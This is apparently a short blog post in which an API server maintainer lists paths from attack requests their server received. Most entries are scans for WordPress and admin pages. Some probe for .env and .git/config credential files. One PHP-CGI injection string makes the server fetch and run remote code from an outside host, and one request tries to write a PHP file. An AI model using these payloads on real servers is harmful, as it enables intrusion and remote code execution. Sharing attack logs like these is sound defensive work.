API Server Attack Logs
I maintain an API server that recently began to receive attacks from bad actors. I will list down a few of the funny ones here.
/.git/
/WP/
/home/
/test/
/bk/
/shop/
/back/
/new/
/backup/
/demo/
/blog/
/old/
/wordpress/
/wp/
/xmlrpc.php
/jonalproducts
/plugins/system/debug/debug.xml
/administrator/help/en-GB/toc.json
/wp-includes/ID3/license.txt
/administrator/language/en-GB/en-GB.xml
/wp-includes/js/jquery/jquery-migrate.min.js
/admin/index.php?route=common%2Flogin
/admin/login.php
/admin/
/administrator/index.php
/?q=user%2Flogin
/_profiler/empty/search/results
/wp-22.php?sfilecontent=%3C%3F%3D409723*20%3B&sfilename=on.php&supfiles=on.php
/2index.php
/admin.php
/wikindex.php
/alfacgiapi/perl.alfa
/ALFA_DATA/alfacgiapi/perl.alfa
/wp-login.php
/index.php%3F-dsafe_mode%253DOff+-ddisable_functions%253DNULL+-dallow_url_fopen%253DOn+-dallow_url_include%253DOn+-dauto_prepend_file%253Dhttp%253A%252F%252Fwww.peruibe2.sp.gov.br%252Fscriptcase%252Ftmp%252Fsc_0382118%252Fdefault.txt=
/.git/config
/.env
logs api attack
about